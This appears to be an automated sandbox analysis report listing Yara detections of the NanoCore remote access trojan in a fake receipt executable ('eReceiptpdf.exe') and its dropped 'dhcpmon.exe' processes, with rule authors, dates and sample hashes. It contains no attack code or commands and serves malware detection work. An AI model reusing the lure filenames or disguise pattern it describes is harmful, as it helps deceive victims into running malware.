Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 18.2.dhcpmon.exe.30f9658.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.dhcpmon.exe.30f9658.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.dhcpmon.exe.30fe6b8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.dhcpmon.exe.40e016e.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Source: eReceiptpdf.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: eReceiptpdf.exe, type: SAMPLE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 18.2.dhcpmon.exe.30f9658.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.dhcpmon.exe.30f9658.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.dhcpmon.exe.30f9658.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.dhcpmon.exe.30f9658.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.dhcpmon.exe.30fe6b8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.dhcpmon.exe.30fe6b8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.2.dhcpmon.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.0.dhcpmon.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.eReceiptpdf.exe.dc0000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.0.dhcpmon.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.eReceiptpdf.exe.dc0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.2.eReceiptpdf.exe.dc0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 18.2.dhcpmon.exe.40e016e.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.dhcpmon.exe.40e016e.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 15.2.dhcpmon.exe.420000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.0.eReceiptpdf.exe.810000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 12.0.dhcpmon.exe.b30000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 18.0.dhcpmon.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.dhcpmon.exe.d40000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0.0.eReceiptpdf.exe.dc0000.15.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 12.2.dhcpmon.exe.b30000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
